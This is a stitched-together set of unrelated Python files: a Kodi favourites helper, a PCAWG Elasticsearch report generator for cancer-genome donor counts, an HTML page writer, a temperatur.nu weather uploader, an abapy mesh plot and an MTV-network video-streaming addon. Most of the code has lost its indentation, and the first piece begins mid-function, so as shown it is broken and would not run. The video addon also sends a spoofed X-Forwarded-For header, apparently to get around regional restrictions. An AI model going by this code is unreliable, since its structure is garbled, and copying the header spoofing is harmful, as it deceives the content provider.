shows.append( [channel,'show_folder', 'By Show','','folder'] )
shows.append( [channel,'unseen', 'All Unseen Episodes','','shows'] )
elif folder=='show_folder':
if os.path.exists(globalvar.FAVOURITES_FILE) :
#Read favourites
fileFav=open(globalvar.FAVOURITES_FILE)
jsonfav = json.loads(fileFav.read())
shows = jsonfav['favourites']
fileFav.close()
return shows
def list_videos(channel,show_title):
videos=[]
if show_title=='unseen':
if os.path.exists(globalvar.FAVOURITES_FILE) :
#Read favourites
fileFav=open(globalvar.FAVOURITES_FILE)
jsonfav = json.loads(fileFav.read())
pDialog = xbmcgui.DialogProgress()
ret = pDialog.create( 'Getting list of episodes', '' )
i=1
for show_folder in jsonfav['favourites']:
pDialog.update((i-1)*100/len(jsonfav['favourites']), 'Checking shows: '+ show_folder[2] + ' - ' + str(i) + '/' + str(len(jsonfav['favourites'])))
                videos += list_videos(show_folder[0], show_folder[1])
i+=1
fileFav.close()
pDialog.close()
else:
print str(channel) + ' : ' + show_title
videos=globalvar.channels[channel][3].list_videos(channel,show_title)
return videos
def add_favourite(channel,param,display):
result=''
shows=list_shows('none','show_folder')
for show in shows:
if show[0]==channel and show[1]==param:
result='Show already in list'
if result=='':
shows.append( [channel,param, display,'','shows'] )
f1=open(globalvar.FAVOURITES_FILE, 'w+')
print >>f1, json.dumps({'favourites': shows})
result='Show added to Favourites'
return result
def rem_favourite(channel,param):
result=''
shows=list_shows('none','show_folder')
for show in shows:
print str(channel) + ':' + param
print str(show[0]) + ':' + show[1]
if show[0]==channel and show[1]==param:
shows.remove(show)
f1=open(globalvar.FAVOURITES_FILE, 'w+')
print >>f1, json.dumps({'favourites': shows})
result='Removed From Favourites'
return result
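# Hedged note (not part of the original addon): entries in FAVOURITES_FILE are
# 5-element lists, so the file written above looks like:
# {"favourites": [["channel1", "show42", "Example Show", "", "shows"]]}
# where the channel and show identifiers here are purely illustrative.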
|
import sys
import os
import re
import json
from collections import OrderedDict
from argparse import ArgumentParser
from argparse import RawDescriptionHelpFormatter
from elasticsearch import Elasticsearch
es_host = 'localhost:9200'
es_type = "donor"
es = Elasticsearch([es_host])
es_queries = [
# order of the queries is important
# query 0: live_alignment_completed_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 1: live_aligned_sanger_variant_not_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"F"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"F"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 2: live_sanger_variant_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "variant_calling_results.sanger_variant_calling.gnos_repo",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_sanger_variant_calling_performed": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 3: live_aligned_dkfz/embl_not_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "gnos_repos_with_complete_alignment_set",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"bool": {
"should":[
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"F"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"F"
]
}
}
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
# es_query for specimen counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"normal_exists_in_gnos_repo": {
"terms": {
"field": "normal_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
},
"tumor_specimens": {
"nested": {
"path": "tumor_alignment_status",
},
"aggs":{
"tumor_exists_in_gnos_repo":{
"terms": {
"field": "tumor_alignment_status.aligned_bam.gnos_repo",
"size": 100
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"bool": {
"should":[
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"F"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"F"
]
}
}
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 4: live_dkfz/embl_called_donors
[
# es_query for donor counts
{
"aggs": {
"gnos_f": {
"aggs": {
"gnos_assignment": {
"terms": {
"field": "original_gnos_assignment",
"size": 100
},
"aggs": {
"exist_in_gnos_repo": {
"terms": {
"field": "variant_calling_results.dkfz_variant_calling.gnos_repo",
"size": 100
},
"aggs": {
"donors": {
"terms": {
"field": "donor_unique_id",
"size": 50000
}
}
}
}
}
}
},
"filter": {
"fquery": {
"query": {
"filtered": {
"query": {
"bool": {
"should": [
{
"query_string": {
"query": "*"
}
}
]
}
},
"filter": {
"bool": {
"must": [
{
"type": {
"value": "donor"
}
},
{
"terms": {
"flags.is_normal_specimen_aligned": [
"T"
]
}
},
{
"terms": {
"flags.are_all_tumor_specimens_aligned": [
"T"
]
}
},
{
"terms": {
"flags.is_embl_variant_calling_performed": [
"T"
]
}
},
{
"terms": {
"flags.is_dkfz_variant_calling_performed": [
"T"
]
}
}
],
"must_not": [
{
"terms": {
"flags.is_manual_qc_failed": [
"T"
]
}
},
{
"terms": {
"flags.is_donor_blacklisted": [
"T"
]
}
}
]
}
}
}
}
}
}
}
},
"size": 0
},
],
# query 3: train2_donors
# query 4: train2_pilot_donors
]
def init_report_dir(metadata_dir, report_name, repo):
report_dir = metadata_dir + '/reports/' + report_name if not repo else metadata_dir + '/reports/' + report_name + '/' + repo
if not os.path.exists(report_dir):
os.makedirs(report_dir)
return report_dir
def generate_report(es_index, es_queries, metadata_dir, report_name, timestamp, repo):
# we need to run several queries to get facet counts for different type of donors
report = OrderedDict()
donors_per_repo = {}
count_types = [
"live_alignment_completed_donors",
"live_aligned_sanger_variant_not_called_donors",
"live_sanger_variant_called_donors",
"live_aligned_embl-dkfz_variant_not_called_donors",
"live_embl-dkfz_variant_called_donors"
#"train2_donors",
#"train2_pilot_donors"
]
for q_index in range(len(count_types)):
# get donor counts
response = es.search(index=es_index, body=es_queries[q_index][0])
#print json.dumps(response['aggregations']['gnos_f']) + '\n' # for debugging
donors_per_repo[count_types[q_index]] = {}
for p in response['aggregations']['gnos_f']['gnos_assignment'].get('buckets'):
count = p.get('doc_count')
original_gnos_repo = p.get('key')
donors_per_repo[count_types[q_index]][original_gnos_repo] = {}
repos = get_donors_per_repo(p.get('exist_in_gnos_repo').get('buckets'), donors_per_repo[count_types[q_index]][original_gnos_repo])
if not report.get(original_gnos_repo):
report[original_gnos_repo] = {}
if not report[original_gnos_repo].get(count_types[q_index]):
report[original_gnos_repo][count_types[q_index]] = {}
report[original_gnos_repo][count_types[q_index]]['count'] = [count] # first count is donor
report[original_gnos_repo][count_types[q_index]]['repos'] = repos
#print json.dumps(donors_per_repo) # for debugging
# get specimen counts
if len(es_queries[q_index]) >= 2:
response = es.search(index=es_index, body=es_queries[q_index][1])
#print json.dumps(response['aggregations']['gnos_f']) + '\n' # for debugging
else:
continue
for p in response['aggregations']['gnos_f']['gnos_assignment'].get('buckets'):
count_normal = p.get('doc_count')
count_tumor = p.get('tumor_specimens').get('doc_count')
original_gnos_repo = p.get('key')
repos = add_specimen_counts_per_repo(
report[original_gnos_repo][count_types[q_index]]['repos'],
p.get('normal_exists_in_gnos_repo').get('buckets'),
p.get('tumor_specimens').get('tumor_exists_in_gnos_repo').get('buckets'),
)
report[original_gnos_repo][count_types[q_index]]['count'].extend([count_normal, count_tumor]) # second count is specimen
report[original_gnos_repo][count_types[q_index]]['repos'] = repos
#print json.dumps(report) # for debug
report_dir = init_report_dir(metadata_dir, report_name, repo)
for ctype in count_types:
for ori_repo in donors_per_repo[ctype]:
for repo in donors_per_repo[ctype][ori_repo]:
with open(report_dir + '/' + ctype + '.' + ori_repo + '.' + repo + '.txt', 'w') as o:
o.write('\n'.join(donors_per_repo[ctype][ori_repo][repo]) + '\n')
repos = {}
for original_repo in report.keys():
repos[get_formal_repo_name(original_repo)] = {
"_ori_count": report[original_repo][ctype]['count'] if report.get(original_repo).get(ctype) else []
}
if not report.get(original_repo).get(ctype):
continue
for repo, count in report[original_repo][ctype]['repos'].iteritems():
repos[get_formal_repo_name(original_repo)][get_formal_repo_name(repo)] = count
with open(report_dir + '/' + ctype + '.repos.json', 'w') as o:
o.write(json.dumps(repos))
def get_formal_repo_name(repo):
repo_url_to_repo = {
"https://gtrepo-bsc.annailabs.com/": "bsc",
"bsc": "bsc",
"https://gtrepo-ebi.annailabs.com/": "ebi",
"ebi": "ebi",
"https://cghub.ucsc.edu/": "cghub",
"cghub": "cghub",
"https://gtrepo-dkfz.annailabs.com/": "dkfz",
"dkfz": "dkfz",
"https://gtrepo-riken.annailabs.com/": "riken",
"riken": "riken",
"https://gtrepo-osdc-icgc.annailabs.com/": "osdc-icgc",
"osdc-icgc": "osdc-icgc",
"https://gtrepo-osdc-tcga.annailabs.com/": "osdc-tcga",
"osdc-tcga": "osdc-tcga",
"https://gtrepo-etri.annailabs.com/": "etri",
"etri": "etri"
}
return repo_url_to_repo.get(repo)
def add_specimen_counts_per_repo(repos, repo_buckets_normal, repo_buckets_tumor):
for s in repo_buckets_normal:
if repos.get(s.get('key')):
repos[s.get('key')].append(s.get('doc_count') if s.get('doc_count') else 0)
for s in repo_buckets_tumor:
if repos.get(s.get('key')):
repos[s.get('key')].append(s.get('doc_count') if s.get('doc_count') else 0)
return repos
def get_donors_per_repo(repo_buckets, donors):
repos = {}
for d in repo_buckets:
repos[d.get('key')] = [d.get('doc_count')]
donors[get_formal_repo_name(d.get('key'))] = [ item.get('key').replace('::', '\t') for item in d.get('donors').get('buckets') ]
return repos
def main(argv=None):
if argv is None:
argv = sys.argv
else:
sys.argv.extend(argv)
parser = ArgumentParser(description="PCAWG Report Generator Using ES Backend",
formatter_class=RawDescriptionHelpFormatter)
parser.add_argument("-m", "--metadata_dir", dest="metadata_dir",
help="Directory containing metadata manifest files", required=True)
parser.add_argument("-r", "--gnos_repo", dest="repo",
help="Specify which GNOS repo to process, process all repos if none specified", required=False)
args = parser.parse_args()
metadata_dir = args.metadata_dir # this dir contains gnos manifest files, will also host all reports
repo = args.repo
if not os.path.isdir(metadata_dir): # TODO: should add more directory name check to make sure it's right
sys.exit('Error: specified metadata directory does not exist!')
    timestamp = metadata_dir.split('/')[-1]
es_index = 'p_' + ('' if not repo else repo+'_') + re.sub(r'\D', '', timestamp).replace('20','',1)
report_name = re.sub(r'^pc_report-', '', os.path.basename(__file__))
report_name = re.sub(r'\.py$', '', report_name)
generate_report(es_index, es_queries, metadata_dir, report_name, timestamp, repo)
return 0
if __name__ == "__main__":
sys.exit(main())
|
'''
Created on 2012-7-4
@author: Vigi
'''
import re
class Categorizer():
def __init__(self, file):
self.file = open(file, 'w')
    def generateList(self):
        """Generate the page body; meant to be overridden by subclasses."""
        pass
def startPage(self):
self.file.write(r'<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8" /><title>')
m = re.match(r"[\.\\a-zA-Z]*?\\([a-zA-Z]*)\.html", self.file.name)
self.file.write(m.group(1))
self.file.write(r'</title><script language="javascript">function select(obj){var links = document.getElementsByTagName("a");for(i=0;i<links.length;i++){links[i].style.fontWeight="normal"}obj.style.fontWeight="bold"}</script></head><body>')
def endPage(self):
self.file.write(r'</body></html>')
self.file.close()
def writeToHTML(self):
self.startPage()
self.generateList()
self.endPage()
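# --- Hedged usage sketch (not part of the original module) ---
# Categorizer is a template: subclasses override generateList() to emit the
# page body between startPage() and endPage(). The path below is hypothetical
# and must match the Windows-style pattern expected by startPage().
class ExampleCategorizer(Categorizer):
    def generateList(self):
        self.file.write(r'<p>example body</p>')

# ExampleCategorizer(r'.\example.html').writeToHTML()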
|
"""Upload current temperature to temperatur.nu.
temperatur.nu is a Swedish web site that shows the current temperature
in many places.
* Web site: http://www.temperatur.nu/
* Additional dependency: http://docs.python-requests.org/
* Example ``weather.ini`` configuration::
[temperaturnu]
hash = longhexnumber
[live]
services = ['temperaturnu', 'underground']
[logged]
services = ['temperaturnu', 'underground']
You receive the hash value from the temperatur.nu admins during sign
up. It looks like ``d3b07384d113edec49eaa6238ad5ff00``.
.. _temperatur.nu: http://www.temperatur.nu/
"""
from __future__ import absolute_import, unicode_literals
from contextlib import contextmanager
from datetime import timedelta
import logging
import os
import sys
import requests
import pywws.service
__docformat__ = "restructuredtext en"
service_name = os.path.splitext(os.path.basename(__file__))[0]
logger = logging.getLogger(__name__)
class ToService(pywws.service.LiveDataService):
config = {'hash': ('', True, 'hash')}
logger = logger
service_name = service_name
template = "#live##temp_out \"'t': '%.1f',\"#"
@contextmanager
def session(self):
with requests.Session() as session:
yield session
def valid_data(self, data):
return data['temp_out'] is not None
def upload_data(self, session, prepared_data={}):
try:
rsp = session.get('http://www.temperatur.nu/rapportera.php',
params=prepared_data, timeout=60)
except Exception as ex:
return False, repr(ex)
if rsp.status_code != 200:
return False, 'http status: {:d}'.format(rsp.status_code)
text = rsp.text.strip()
if text:
return True, 'server response "{:s}"'.format(text)
return True, 'OK'
if __name__ == "__main__":
sys.exit(pywws.service.main(ToService))
|
from abapy.mesh import Mesh, Nodes, RegularQuadMesh
import matplotlib.pyplot as plt
from numpy import cos, pi
def function(x, y, z, labels):
r = (x**2 + y**2)**.5
return cos(2*pi*x)*cos(2*pi*y)/(r+1.)
N1, N2 = 100, 25
l1, l2 = 4., 1.
Ncolor = 20
mesh = RegularQuadMesh(N1 = N1, N2 = N2, l1 = l1, l2 = l2)
field = mesh.nodes.eval_function(function)
x,y,z = mesh.get_edges() # Mesh edges
X,Y,Z,tri = mesh.dump2triplot()
xb,yb,zb = mesh.get_border()
fig = plt.figure(figsize=(16,4))
fig.gca().set_aspect('equal')
fig.frameon = True
plt.plot(xb,yb,'k-', linewidth = 2.)
plt.xticks([0,l1],['$0$', '$l_1$'], fontsize = 15.)
plt.yticks([0,l2],['$0$', '$l_2$'], fontsize = 15.)
plt.tricontourf(X,Y,tri,field.data, Ncolor)
plt.tricontour(X,Y,tri,field.data, Ncolor, colors = 'black')
plt.show()
|
import common
import connection
import m3u8
import base64
import datetime
import os
import ustvpaths
import re
import simplejson
import sys
import threading
import time
import urllib
import xbmc
import xbmcaddon
import xbmcgui
import xbmcplugin
from bs4 import BeautifulSoup, SoupStrainer
try:
from pycaption import detect_format, SRTWriter
except:
detect_format = None
from Queue import PriorityQueue
addon = xbmcaddon.Addon()
player = common.XBMCPlayer()
pluginHandle = int(sys.argv[1])
VIDEOURL = 'http://media.mtvnservices.com/'
VIDEOURLAPI = 'http://media-utils.mtvnservices.com/services/MediaGenerator/%s'
VIDEOURLAPIHLS = 'http://media-utils.mtvnservices.com/services/MediaGenerator/%s?device=Android&deviceOsVersion=4.4.4'
TYPES = [('fullEpisodes' , 'Full Episodes'), ('bonusClips,afterShowsClips,recapsClips,sneakPeeksClips,dailies,showClips' , 'Extras')]
DEVICE = 'Xbox'
BITRATERANGE = 10
TIMEOUT = 50
class Thread(threading.Thread):
def __init__(self, target, *args):
self._target = target
self._args = args
threading.Thread.__init__(self)
def run(self):
self._target(*self._args)
def masterlist(SITE, SHOWS):
master_db = []
master_data = connection.getURL(SHOWS)
master_tree = simplejson.loads(master_data)
for master_item in master_tree['promoList']['promos']:
try:
master_item = master_item['promo']['associatedContent']['series']
master_name = master_item['title']
master_id = master_item['seriesId']
if master_id is not None:
master_db.append((master_name, SITE, 'seasons', master_id))
else:
pass
except:
pass
return master_db
def seasons(SITE, API, season_id = common.args.url):
seasons = []
count = 0
for type in TYPES:
season_url = API + 'series/' + season_id + '/playlists.json?page=0&pageSize=500&type=' + type[0]
season_data = connection.getURL(season_url)
try:
season_tree = simplejson.loads(season_data)['series']['playlists']
for season_item in season_tree:
try:
if (season_item['playlist']['distributionPolicies'][0]['distributionPolicy']['policyType'] == 'playable'):
count = count + 1
                except:
                    if season_item['playlist']['distributionPolicies'][0]['policyType'] == 'playable':
                        count = count + 1
if count > 0:
seasons.append((type[1], SITE, 'episodes', season_url, -1, -1))
except:
pass
return seasons
def episodes(SITE, episode_url = common.args.url):
episodes = []
episode_data = connection.getURL(episode_url)
episode_tree = simplejson.loads(episode_data)
for episode_item in episode_tree['series']['playlists']:
show_name = episode_tree['series']['title']
episode_item = episode_item['playlist']
if '|' in episode_item['headline']:
episode_name = episode_item['headline'].split('|')[-1].strip()
elif '- ' in episode_item['headline']:
episode_name = episode_item['headline'].split('- ')[-1].strip()
else:
try:
episode_name = episode_item['headline'].split(':')[1].strip()
except:
episode_name = episode_item['headline']
try:
            episode_info = re.compile('[sS]([0-9]).[eE]?([0-9]{0,2}).*').findall(episode_item['title'])
try:
episode_season, episode_number = episode_info[0]
except:
episode_season = episode_info
episode_number = -1
except:
episode_season = -1
episode_number = -1
url = episode_item['id']
try:
episode_plot = episode_item['subhead']
except:
episode_plot = ''
episode_thumb = episode_item['image']
try:
episode_duration = common.format_seconds(episode_item['duration']['timecode'])
except:
continue
episode_type = episode_item['contentType'][:-1]
episode_airdate = common.format_date(epoch = episode_item['postedDate']['timestamp'])
u = sys.argv[0]
u += '?url="' + urllib.quote_plus(url) + '"'
u += '&mode="' + SITE + '"'
u += '&sitemode="play"'
infoLabels = { 'title' : episode_name,
'plot' : episode_plot,
'durationinseconds' : episode_duration,
'TVShowTitle' : show_name,
'season' : episode_season,
'episode' : episode_number,
'premiered' : episode_airdate}
try:
if (episode_item['distributionPolicies'][0]['distributionPolicy']['policyType'] == 'playable'):
episodes.append((u, episode_name, episode_thumb, infoLabels, 'list_qualities', False, episode_type))
except:
if (episode_item['distributionPolicies'][0]['policyType'] == 'playable'):
episodes.append((u, episode_name, episode_thumb, infoLabels, 'list_qualities', False, episode_type))
else:
pass
return episodes
def play_video(BASE, video_uri = common.args.url, media_base = VIDEOURL):
video_url = media_base + video_uri
try:
qbitrate = common.args.quality
except:
qbitrate = None
video_url2 = 'stack://'
closedcaption = []
exception = False
queue = PriorityQueue()
segments = []
if 'feed' in video_uri:
feed_url = video_uri
else:
swf_url = connection.getRedirect(video_url, header = {'Referer' : BASE})
params = dict(item.split("=") for item in swf_url.split('?')[1].split("&"))
uri = urllib.unquote_plus(params['uri'])
config_url = urllib.unquote_plus(params['CONFIG_URL'].replace('Other', DEVICE))
config_data = connection.getURL(config_url, header = {'Referer' : video_url, 'X-Forwarded-For' : '12.13.14.15'})
config_tree = BeautifulSoup(config_data, 'html.parser')
if not config_tree.error:
feed_url = config_tree.feed.string
uri = urllib.quote_plus(uri)
feed_url = feed_url.replace('{uri}', uri).replace('&', '&').replace('{device}', DEVICE).replace('{ref}', 'None').replace('{type}', 'network').strip()
else:
exception = True
error_text = config_tree.error.string.split('/')[-1].split('_')
if error_text[1] == 'loc':
params = dict(item.split("=") for item in config_url.split('?')[-1].split('&'))
common.show_exception('Geo', params['geo'])
if not exception:
feed_data = connection.getURL(feed_url, header = {'X-Forwarded-For' : '12.13.14.15'})
video_tree = BeautifulSoup(feed_data, 'html.parser', parse_only = SoupStrainer('media:group'))
video_segments = video_tree.find_all('media:content')
if not video_segments:
video_tree = BeautifulSoup(feed_data, 'html.parser')
common.show_exception(video_tree.find('meta', property = "og:site_name")['content'], video_tree.find('meta', property = "og:url")['content'])
exception = True
threads = []
for i, video_item in enumerate(video_segments):
try:
threads.append(Thread(get_videos, queue, i, video_item, qbitrate, False))
except Exception, e:
print "Exception: ", e
[i.start() for i in threads]
[i.join() for i in threads]
while not queue.empty():
video_data2 = queue.get()
video_url2 += video_data2[1] + ' , '
segments.append(video_data2[2])
closedcaption.append((video_data2[3], int(video_data2[0])))
player._segments_array = segments
finalurl = video_url2[:-3]
time.sleep(20)
if (addon.getSetting('enablesubtitles') == 'true') and closedcaption and detect_format is not None:
convert_subtitles(closedcaption)
player._subtitles_Enabled = True
item = xbmcgui.ListItem(path = finalurl)
if player._localHTTPServer:
filestring = 'XBMC.RunScript(' + os.path.join(ustvpaths.LIBPATH,'proxy.py') + ', 12345)'
xbmc.executebuiltin(filestring)
finalurl = video_url2[:-3]
#localhttpserver = True
time.sleep(20)
queue.task_done()
try:
item.setThumbnailImage(common.args.thumb)
except:
pass
try:
item.setInfo('Video', { 'title' : common.args.name,
'season' : common.args.season_number,
'episode' : common.args.episode_number,
'TVShowTitle' : common.args.show_title })
except:
pass
xbmcplugin.setResolvedUrl(pluginHandle, True, item)
while player.is_active:
player.sleep(250)
def play_video2(API, video_url = common.args.url, rtmp = True):
try:
qbitrate = common.args.quality
except:
qbitrate = None
video_url2 = 'stack://'
threads = []
segments = []
closedcaption = []
queue = PriorityQueue()
video_data = connection.getURL(API + 'playlists/%s/videos.json' % video_url)
video_tree = simplejson.loads(video_data)
video_item = video_tree['playlist']['videos']
for i in range(0, len(video_item)):
try:
threads.append(Thread(get_videos, queue, i, video_item[i], qbitrate, rtmp))
except Exception, e:
print "Exception: ", e
[i.start() for i in threads]
[i.join() for i in threads]
while not queue.empty():
video_data2 = queue.get()
video_url2 += video_data2[1] + ' , '
segments.append(video_data2[2])
closedcaption.append((video_data2[3], int(video_data2[0])))
player._segments_array = segments
finalurl = video_url2[:-3]
if (addon.getSetting('enablesubtitles') == 'true') and closedcaption and detect_format is not None:
convert_subtitles(closedcaption)
player._subtitles_Enabled = True
item = xbmcgui.ListItem(path = finalurl)
queue.task_done()
try:
item.setThumbnailImage(common.args.thumb)
except:
pass
try:
item.setInfo('Video', { 'title' : common.args.name,
'season' : common.args.season_number,
'episode' : common.args.episode_number,
'TVShowTitle' : common.args.show_title })
except:
pass
xbmcplugin.setResolvedUrl(pluginHandle, True, item)
while player.is_active:
player.sleep(250)
def get_videos(queue, i, video_item, qbitrate, rtmp = False):
try:
video_mgid = video_item['video']['mgid']
except:
try:
video_mgid = video_item['url'].split('uri=')[1].split('&')[0]
except:
try:
video_mgid = video_item['url'].split('mgid=')[1].split('&')[0]
except:
video_mgid = video_item['url'].split('/')[-1].split('?')[0]
video_data = connection.getURL(VIDEOURLAPI % video_mgid)
video_tree = BeautifulSoup(video_data, 'html.parser')
try:
duration = video_tree.findAll('rendition')[0]['duration']
except:
duration = 0
try:
closedcaption = video_tree.find('typographic', format = 'ttml')['src']
except:
closedcaption = None
hbitrate = -1
lbitrate = -1
sbitrate = int(addon.getSetting('quality'))
if rtmp:
try:
video_url2 = video_tree.findAll('rendition')
if qbitrate is None:
for video_index in video_url2:
bitrate = int(video_index['bitrate'])
if bitrate < lbitrate or lbitrate == -1:
lbitrate = bitrate
lplaypath_url = video_index.src.string
if bitrate > hbitrate and bitrate <= sbitrate:
hbitrate = bitrate
playpath_url = video_index.src.string
else:
playpath_url = video_tree.find('rendition', bitrate = qbitrate).src.string
if playpath_url is None:
playpath_url = lplaypath_url
if "gsp.alias" in playpath_url:
file_name = 'rtmpe://cp10740.edgefcs.net/ondemand/mtvnorigin/gsp.alias' + playpath_url.split('/gsp.alias')[1]
else:
file_name = playpath_url
queue.put([i, file_name, duration, closedcaption])
except:
pass
else:
try:
video_data = connection.getURL(VIDEOURLAPIHLS % video_mgid)
video_tree = BeautifulSoup(video_data, 'html.parser')
video_menu = video_tree.src.string
hbitrate = -1
lbitrate = -1
m3u8_url = None
#can we just pass video_menu
if addon.getSetting('sel_quality') == 'true' or qbitrate is not None or int(xbmc.getInfoLabel( "System.BuildVersion" )[:2]) < 14 or common.use_proxy() :
m3u8_master_data = connection.getURL(video_menu, savecookie = True, cookiefile = i)
m3u8_master = m3u8.parse(m3u8_master_data)
sbitrate = int(addon.getSetting('quality')) * 1024
for video_index in m3u8_master.get('playlists'):
bitrate = int(video_index.get('stream_info')['bandwidth'])
if qbitrate is None:
if bitrate < lbitrate or lbitrate == -1:
lbitrate = bitrate
lm3u8_url = video_index.get('uri')
if bitrate > hbitrate and bitrate <= sbitrate:
hbitrate = bitrate
m3u8_url = video_index.get('uri')
